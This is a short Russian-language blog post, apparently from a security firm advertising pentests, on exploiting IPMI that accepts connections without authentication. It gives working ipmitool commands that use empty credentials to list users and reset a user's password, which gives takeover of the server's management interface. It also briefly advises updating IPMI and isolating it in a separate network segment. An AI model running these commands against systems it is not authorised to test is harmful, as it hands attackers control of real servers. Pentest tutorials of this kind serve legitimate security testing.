IPMI старых версий подвержен множеству уязвимостей. Поэтому ответственным за серверную системы рекомендуется постоянно обновлять IPMI на серверах, а так же вынести его в изолированный сегмент. Одну из уязвимостей я описывал несколько лет назад в статье: Получение доступа к iLO через уязвимость IPMI Cipher 0. Сегодня мы поговорим о более простой уязвимости, которая часто появляется во время проведения теста на проникновение: доступу к IPMI без аутентификации.
Сначала установим все, что нам потребуется:
apt-get install ipmitool
Далее,найдя потенциально уязвимую систему, попробует получить список пользователей из IPMI:
ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user list
где:
-I — выбор протокола. lanplus говорит, что мы используем протокол IPMI v2.0 RMCP+ LAN Interface;
-H — IP-адрес атакуемого хоста;
-U — имя пользователя (кавычки указывают, что без имени пользователя);
-P — пароль (кавычки указывают, что без пароля);
user list — получить список пользователей.
Если уязвимость присутствует, то мы увидим список пользователей.
Теперь можно сменить пароль какому-либо пользователю:
ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user set password X passpass
user set password X passpass — установить пользователю номер X (номер пользователя берем из списка, полученного ранее) пароль passpass.
Далее можно подключаться к IPMI через SSH или Web-интерфейс.
Заказать Аудит Безопасности или Пентест Вашей IT-инфраструктурыБыть уверенным в своей IT-инфраструктуре — это быть уверенным в завтрашнем дне. Для того, чтобы сделать заказ:
|